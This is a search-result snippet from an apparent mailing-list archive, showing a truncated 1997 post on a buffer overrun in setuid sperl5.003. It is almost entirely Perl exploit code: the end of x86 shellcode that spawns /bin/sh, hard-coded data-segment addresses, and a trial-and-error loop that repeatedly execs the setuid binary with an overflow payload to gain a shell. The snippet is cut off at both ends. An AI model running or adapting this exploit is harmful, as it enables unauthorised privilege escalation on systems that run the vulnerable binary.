Displaying 1 result from an estimated 1 matches for "smash_m".
Did you mean:
smash_me
1997 Nov 13
0
another buffer overrun in sperl5.003
...4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
# start and end of .data
# adjust this using /proc/*/maps
$databot = 0x080a2000;
$datatop = 0x080ab000;
# trial and error loop
$address = $databot + 4;
while ($address < $datatop) {
$smash_me =
$shellcode . (''A'' x (2052 - length($shellcode))) .
(pack("l", $address) x 1000) . (''B'' x 1000);
$pid = fork();
if (!$pid) {
exec(''/usr/bin/sperl5.003'', $smash_me);
}
else {
wait;
if ($? == 0) {
prin...